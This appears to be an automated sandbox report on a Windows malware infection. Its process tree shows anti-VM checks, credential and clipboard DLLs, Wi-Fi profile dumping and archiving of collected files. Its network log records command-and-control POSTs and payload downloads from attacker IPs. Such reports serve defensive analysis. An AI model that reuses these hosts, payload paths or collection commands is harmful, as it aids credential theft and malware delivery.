C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3068
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
  2⤵
  - Loads dropped DLL
  PID:1712
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:4968
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:2484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\906287020291_Desktop.zip' -CompressionLevel Optimal
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3520
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:1044

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2484

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3428

Network

DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; domain=.bing.com; expires=Thu, 22-May-2025 17:07:29 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 693888A47EF44E92B03D25D90D7D9BF1 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:29Z
date: Sat, 27 Apr 2024 17:07:29 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=5kAXrMywdhLn16yyUT0Rj-ACdIrO-_FBZkgY3G-ae6E; domain=.bing.com; expires=Thu, 22-May-2025 17:07:30 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9D807B57F5A04C778A641BE2280068F6 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:30Z
date: Sat, 27 Apr 2024 17:07:30 GMT
GET

https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893

Remote address:

23.62.61.194:443

Request

GET /aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 350BA4A5571A486D803814C7B9FBA84B Ref B: AMS04EDGE2718 Ref C: 2024-04-27T17:07:30Z
content-length: 0
date: Sat, 27 Apr 2024 17:07:30 GMT
set-cookie: _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312; path=/; httponly; domain=bing.com
set-cookie: MUIDB=39284F0CA7EB6DE029235B62A60B6CFA; path=/; httponly; expires=Thu, 22-May-2025 17:07:30 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.be3d3e17.1714237650.112e0ca5
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

73.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.159.190.20.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

194.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.61.62.23.in-addr.arpa

IN PTR

Response

194.61.62.23.in-addr.arpa

IN PTR

a23-62-61-194deploystaticakamaitechnologiescom
POST

http://193.233.132.139/sev56rkm/index.php

explorta.exe

Remote address:

193.233.132.139:80

Request

POST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://193.233.132.139/sev56rkm/index.php

explorta.exe

Remote address:

193.233.132.139:80

Request

POST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://193.233.132.139/sev56rkm/index.php

explorta.exe

Remote address:

193.233.132.139:80

Request

POST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://193.233.132.139/sev56rkm/index.php

explorta.exe

Remote address:

193.233.132.139:80

Request

POST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://193.233.132.139/sev56rkm/index.php

explorta.exe

Remote address:

193.233.132.139:80

Request

POST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://193.233.132.139/sev56rkm/index.php

explorta.exe

Remote address:

193.233.132.139:80

Request

POST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://193.233.132.167/cost/sarra.exe

explorta.exe

Remote address:

193.233.132.167:80

Request

GET /cost/sarra.exe HTTP/1.1
Host: 193.233.132.167

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:32 GMT
Content-Type: application/octet-stream
Content-Length: 2374144
Last-Modified: Sat, 27 Apr 2024 15:51:14 GMT
Connection: keep-alive
ETag: "662d1ef2-243a00"
Accept-Ranges: bytes
GET

http://193.233.132.167/mine/amert.exe

explorta.exe

Remote address:

193.233.132.167:80

Request

GET /mine/amert.exe HTTP/1.1
Host: 193.233.132.167

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:34 GMT
Content-Type: application/octet-stream
Content-Length: 1895424
Last-Modified: Sat, 27 Apr 2024 15:51:47 GMT
Connection: keep-alive
ETag: "662d1f13-1cec00"
Accept-Ranges: bytes
GET

http://193.233.132.167/mine/random.exe

explorta.exe

Remote address:

193.233.132.167:80

Request

GET /mine/random.exe HTTP/1.1
Host: 193.233.132.167

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:36 GMT
Content-Type: application/octet-stream
Content-Length: 1166336
Last-Modified: Sat, 27 Apr 2024 15:50:45 GMT
Connection: keep-alive
ETag: "662d1ed5-11cc00"
Accept-Ranges: bytes
GET

http://193.233.132.167/cost/random.exe

explorta.exe

Remote address:

193.233.132.167:80

Request

GET /cost/random.exe HTTP/1.1
Host: 193.233.132.167

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:07:38 GMT
Content-Type: application/octet-stream
Content-Length: 2413056
Last-Modified: Sat, 27 Apr 2024 15:50:59 GMT
Connection: keep-alive
ETag: "662d1ee3-24d200"
Accept-Ranges: bytes
DNS

139.132.233.193.in-addr.arpa

Remote address:

8.8.8.8:53

Request

139.132.233.193.in-addr.arpa

IN PTR

Response
DNS

167.132.233.193.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.132.233.193.in-addr.arpa

IN PTR

Response
DNS

www.youtube.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

216.58.212.206
GET

https://www.youtube.com/account

chrome.exe

Remote address:

142.250.179.238:443

Request

GET /account HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
x-client-data: CJHdygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

accounts.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

173.194.69.84
DNS

195.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.187.250.142.in-addr.arpa

IN PTR

Response

195.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f31e100net
DNS

234.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.187.250.142.in-addr.arpa

IN PTR

Response

234.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f101e100net
DNS

238.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.179.250.142.in-addr.arpa

IN PTR

Response

238.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f141e100net
DNS

content-autofill.googleapis.com

chrome.exe

Remote address:

8.8.8.8:53

Request

content-autofill.googleapis.com

IN A

Response

content-autofill.googleapis.com

IN A

172.217.16.234

content-autofill.googleapis.com

IN A

142.250.200.10

content-autofill.googleapis.com

IN A

142.250.200.42

content-autofill.googleapis.com

IN A

216.58.201.106

content-autofill.googleapis.com

IN A

216.58.204.74

content-autofill.googleapis.com

IN A

216.58.212.202

content-autofill.googleapis.com

IN A

172.217.169.74

content-autofill.googleapis.com

IN A

142.250.179.234

content-autofill.googleapis.com

IN A

142.250.180.10

content-autofill.googleapis.com

IN A

142.250.187.202

content-autofill.googleapis.com

IN A

142.250.187.234

content-autofill.googleapis.com

IN A

142.250.178.10
GET

https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto

chrome.exe

Remote address:

172.217.16.234:443

Request

GET /v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto HTTP/2.0
host: content-autofill.googleapis.com
x-goog-encode-response-if-executable: base64
x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
x-client-data: CJHdygE=
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

accounts.youtube.com

chrome.exe

Remote address:

8.8.8.8:53

Request

accounts.youtube.com

IN A

Response

accounts.youtube.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

172.217.16.238
DNS

84.69.194.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

84.69.194.173.in-addr.arpa

IN PTR

Response

84.69.194.173.in-addr.arpa

IN PTR

ef-in-f841e100net
DNS

3.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.180.250.142.in-addr.arpa

IN PTR

Response

3.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f31e100net
DNS

227.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.212.58.216.in-addr.arpa

IN PTR

Response

227.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f31e100net

227.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f3�H

227.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f227�H
DNS

234.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.16.217.172.in-addr.arpa

IN PTR

Response

234.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f101e100net

234.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f10�I
GET

https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684

chrome.exe

Remote address:

172.217.16.238:443

Request

GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684 HTTP/2.0
host: accounts.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "110.0.5481.104"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJHdygE=
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=YS5PzM7dWFk
cookie: VISITOR_INFO1_LIVE=dZ-UnFWGjCk
cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLQ%3D%3D
GET

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1

chrome.exe

Remote address:

172.217.16.238:443

Request

GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.178.4
DNS

238.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.16.217.172.in-addr.arpa

IN PTR

Response

238.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f141e100net

238.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f14�I
DNS

4.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.178.250.142.in-addr.arpa

IN PTR

Response

4.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f41e100net
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

172.217.16.238
DNS

play.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.187.206
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

chrome.exe

Remote address:

142.250.187.206:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

206.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.187.250.142.in-addr.arpa

IN PTR

Response

206.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f141e100net
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
POST

http://193.233.132.167/enigma/index.php

chrosha.exe

Remote address:

193.233.132.167:80

Request

POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:08:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://193.233.132.167/enigma/index.php

chrosha.exe

Remote address:

193.233.132.167:80

Request

POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:08:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://193.233.132.167/enigma/Plugins/cred64.dll

chrosha.exe

Remote address:

193.233.132.167:80

Request

GET /enigma/Plugins/cred64.dll HTTP/1.1
Host: 193.233.132.167

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:08:12 GMT
Content-Type: application/octet-stream
Content-Length: 1285632
Last-Modified: Thu, 01 Feb 2024 16:00:36 GMT
Connection: keep-alive
ETag: "65bbc024-139e00"
Accept-Ranges: bytes
GET

http://193.233.132.167/enigma/Plugins/clip64.dll

chrosha.exe

Remote address:

193.233.132.167:80

Request

GET /enigma/Plugins/clip64.dll HTTP/1.1
Host: 193.233.132.167

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:08:23 GMT
Content-Type: application/octet-stream
Content-Length: 112128
Last-Modified: Thu, 01 Feb 2024 16:00:35 GMT
Connection: keep-alive
ETag: "65bbc023-1b600"
Accept-Ranges: bytes
DNS

17.14.97.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.14.97.104.in-addr.arpa

IN PTR

Response

17.14.97.104.in-addr.arpa

IN PTR

a104-97-14-17deploystaticakamaitechnologiescom
POST

http://193.233.132.167/enigma/index.php

rundll32.exe

Remote address:

193.233.132.167:80

Request

POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 21
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 27 Apr 2024 17:08:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://193.233.132.167/enigma/index.php

